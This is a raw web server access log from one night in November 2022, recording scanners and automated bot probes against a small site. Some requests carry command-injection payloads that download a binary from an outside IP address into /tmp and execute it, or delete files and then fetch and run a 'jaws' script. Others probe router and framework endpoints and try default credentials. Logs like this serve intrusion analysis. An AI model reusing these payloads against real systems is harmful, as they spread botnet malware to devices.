205.210.31.185 - - [08/Nov/2022:03:47:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
3.248.77.100 - - [08/Nov/2022:03:50:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Apache-HttpClient/4.5.1 (Java/11.0.10)"
3.248.77.100 - - [08/Nov/2022:03:50:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Java/11.0.10"
193.47.61.60 - - [08/Nov/2022:03:52:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [08/Nov/2022:03:52:52 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
152.89.196.211 - - [08/Nov/2022:03:59:45 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [08/Nov/2022:04:00:41 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.91.116.131 - - [08/Nov/2022:04:00:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
188.166.79.4 - - [08/Nov/2022:04:07:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145"
188.166.79.4 - - [08/Nov/2022:04:07:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML"
23.251.102.82 - - [08/Nov/2022:04:10:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
35.181.7.149 - - [08/Nov/2022:04:11:29 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0"
190.120.96.124 - - [08/Nov/2022:04:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.47.61.60 - - [08/Nov/2022:04:12:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [08/Nov/2022:04:12:58 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
193.47.61.60 - - [08/Nov/2022:04:24:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [08/Nov/2022:04:24:20 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
111.118.40.97 - - [08/Nov/2022:04:24:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
152.89.196.211 - - [08/Nov/2022:04:25:50 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [08/Nov/2022:04:26:05 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.47.61.60 - - [08/Nov/2022:04:26:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [08/Nov/2022:04:26:53 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
152.89.196.211 - - [08/Nov/2022:04:27:11 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.31.46.211 - - [08/Nov/2022:04:27:52 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.122.204.30 - - [08/Nov/2022:04:31:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:31:59 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:34:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:34:02 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:35:27 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
37.44.238.183 - - [08/Nov/2022:04:36:55 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.122.204.30 - - [08/Nov/2022:04:37:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:37:14 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:38:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:38:11 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:38:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:38:23 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
165.22.74.158 - - [08/Nov/2022:04:42:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.74.158 - - [08/Nov/2022:04:42:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.74.158 - - [08/Nov/2022:04:42:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
128.14.209.170 - - [08/Nov/2022:04:42:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.122.204.30 - - [08/Nov/2022:04:42:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:42:56 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
152.89.196.211 - - [08/Nov/2022:04:43:11 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.122.204.30 - - [08/Nov/2022:04:43:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:43:45 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:44:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:44:04 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:04:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:04:45:38 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
184.94.240.88 - - [08/Nov/2022:04:49:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
152.89.196.211 - - [08/Nov/2022:04:49:10 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.224.88.178 - - [08/Nov/2022:04:52:06 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
192.241.201.218 - - [08/Nov/2022:04:53:53 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
167.248.133.63 - - [08/Nov/2022:04:54:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.63 - - [08/Nov/2022:04:54:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.63 - - [08/Nov/2022:04:54:50 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.63 - - [08/Nov/2022:04:54:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
192.241.201.218 - - [08/Nov/2022:04:55:31 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.201.218 - - [08/Nov/2022:04:58:23 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
152.89.196.211 - - [08/Nov/2022:04:58:25 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [08/Nov/2022:04:58:26 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.201.218 - - [08/Nov/2022:04:59:09 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
138.68.138.126 - - [08/Nov/2022:05:02:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.68.138.126 - - [08/Nov/2022:05:02:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.68.138.126 - - [08/Nov/2022:05:02:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.201.218 - - [08/Nov/2022:05:02:35 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
165.22.54.57 - - [08/Nov/2022:05:02:50 +0100] "XJ'R'\x02\x02\xf9" 501 323 "-" "-"
165.22.54.57 - - [08/Nov/2022:05:02:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.54.57 - - [08/Nov/2022:05:02:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.54.57 - - [08/Nov/2022:05:02:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.201.218 - - [08/Nov/2022:05:03:08 +0100] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
208.67.104.167 - - [08/Nov/2022:05:08:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
208.67.104.167 - - [08/Nov/2022:05:08:20 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.27.1"
172.91.47.43 - - [08/Nov/2022:05:11:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
198.235.24.137 - - [08/Nov/2022:05:11:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
216.145.5.42 - - [08/Nov/2022:05:14:14 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
216.145.5.42 - - [08/Nov/2022:05:14:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
152.89.196.211 - - [08/Nov/2022:05:14:32 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
194.55.186.126 - - [08/Nov/2022:05:15:27 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)"
194.55.186.126 - - [08/Nov/2022:05:17:27 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )"
152.89.196.211 - - [08/Nov/2022:05:19:25 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
205.210.31.59 - - [08/Nov/2022:05:19:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
152.89.196.211 - - [08/Nov/2022:05:19:59 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
109.206.243.220 - - [08/Nov/2022:05:23:49 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/579.55 (KHTML, like Gecko) Chrome/59.0.2822 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 9_0; Win64; x64) AppleWebKit/599.52 (KHTML, like Gecko) Chrome/74.0.677 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:26 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 9_2; Win64; x64) AppleWebKit/572.49 (KHTML, like Gecko) Chrome/96.0.2278 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:27 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 7_2_2; Win64; x64) AppleWebKit/566.51 (KHTML, like Gecko) Chrome/102.0.1553 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:28 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:28 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
106.75.4.49 - - [08/Nov/2022:05:27:29 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
213.16.221.30 - - [08/Nov/2022:05:35:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
37.44.238.183 - - [08/Nov/2022:05:41:47 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.76.96.55 - - [08/Nov/2022:05:42:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
154.209.125.119 - - [08/Nov/2022:05:42:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
121.233.219.234 - - [08/Nov/2022:05:48:06 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
35.233.62.116 - - [08/Nov/2022:05:53:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.76.96.55 - - [08/Nov/2022:05:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
45.227.254.54 - - [08/Nov/2022:05:54:00 +0100] "\x03" 501 316 "-" "-"
213.16.155.50 - - [08/Nov/2022:05:54:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
31.59.200.122 - - [08/Nov/2022:05:56:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
194.180.48.125 - - [08/Nov/2022:06:06:38 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozilla/5.0 (iPad; CPU OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1"
92.118.39.78 - - [08/Nov/2022:06:08:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.227.254.54 - - [08/Nov/2022:06:19:05 +0100] "\x03" 501 316 "-" "-"
64.62.197.193 - - [08/Nov/2022:06:25:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
65.49.20.101 - - [08/Nov/2022:06:25:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37"
75.67.32.138 - - [08/Nov/2022:06:26:25 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
64.62.197.195 - - [08/Nov/2022:06:27:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
65.49.20.93 - - [08/Nov/2022:06:29:37 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
185.122.204.30 - - [08/Nov/2022:06:29:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:29:37 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:30:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:30:38 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:31:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:31:20 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:31:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:31:24 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:31:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:31:33 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
51.81.165.194 - - [08/Nov/2022:06:32:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
92.118.39.78 - - [08/Nov/2022:06:34:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
37.44.238.183 - - [08/Nov/2022:06:34:38 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [08/Nov/2022:06:36:28 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.118.39.78 - - [08/Nov/2022:06:37:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:37:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:37:56 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:39:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:39:02 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:39:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:39:43 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:41:35 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [08/Nov/2022:06:42:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [08/Nov/2022:06:42:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
92.118.39.78 - - [08/Nov/2022:06:46:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
120.229.59.186 - - [08/Nov/2022:06:47:16 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
205.210.31.176 - - [08/Nov/2022:06:47:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.135 - - [08/Nov/2022:06:48:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.142.146.35 - - [08/Nov/2022:06:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
82.151.125.20 - - [08/Nov/2022:06:54:09 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [08/Nov/2022:07:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [08/Nov/2022:07:01:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.89.196.211 - - [08/Nov/2022:07:04:53 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [08/Nov/2022:07:05:43 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:07:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:06:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.110.222.95 - - [08/Nov/2022:07:07:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:07:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.183.154.94 - - [08/Nov/2022:07:07:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [08/Nov/2022:07:08:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [08/Nov/2022:07:09:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [08/Nov/2022:07:09:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.199 - - [08/Nov/2022:07:10:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
212.91.246.72 - - [08/Nov/2022:07:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:11:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:07:12:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.204 - - [08/Nov/2022:07:13:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
212.91.246.72 - - [08/Nov/2022:07:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.60 - - [08/Nov/2022:07:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.60 - - [08/Nov/2022:07:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.60 - - [08/Nov/2022:07:14:46 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
